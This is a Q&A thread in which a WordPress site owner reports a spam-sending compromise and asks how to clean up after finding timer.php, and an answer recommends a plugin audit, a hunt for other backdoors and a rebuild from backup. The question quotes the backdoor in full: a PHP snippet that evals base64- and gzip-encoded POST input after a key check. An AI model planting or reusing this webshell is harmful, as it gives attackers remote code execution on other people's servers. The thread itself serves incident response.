0

Suddenly one of our Wordpress websites started sending spam emails and it was blacklisted on MXToolBox. So with the server support I scaned the files and found a strange file called timer.php containing the following code block:

 if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1")
     {echo "200"; exit;}
 if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="some code")
     eval(gzuncompress(base64_decode($_POST["chk"])));

After some online research I have found out that this is malicious and a backdoor. What are the recommended actions I should take to mitigate this? Would deleting the file be enough?

Anders
  • 65,052
  • 24
  • 180
  • 218
mapmalith
  • 141
  • 7

1 Answers1

1

In short No.

Per @ Alexander O'Mara 's comment you need to find the access.

Wordpress plugins are notorious for adding vulnerabilities a good start would be to audit your plugins:

  1. Get a list of what is there
  2. Confirm all items are supposed to be there.
  3. Find out why they are needed
  4. Ensure the required ones are up-to-date
  5. Check for known vulnerabilities in the latest versions of those
  6. Reconsider the requirement or look for replacements if there is.

You will also need to check for other potential access (wordpress is a good candidate but not the only one) and backdoors they may have left (i.e. ways to regain access such as a new user or reverse shell)

If you have a backup it would be best to update that & rebuild from the basic server. I.e. delete the current live version & start from the backup or a clean build.

There are services that will filter your outbound mail, we use "Symantec Email Security.cloudmessage" this can alert you if you start to send questionable mail and it seems to work for us I'm sure there are dozens of similar services

Depending on budget time etc you may consider getting someone to do this for you - beware there are lots of people who can use Wordpress but have no idea about security.

Nate
  • 161
  • 4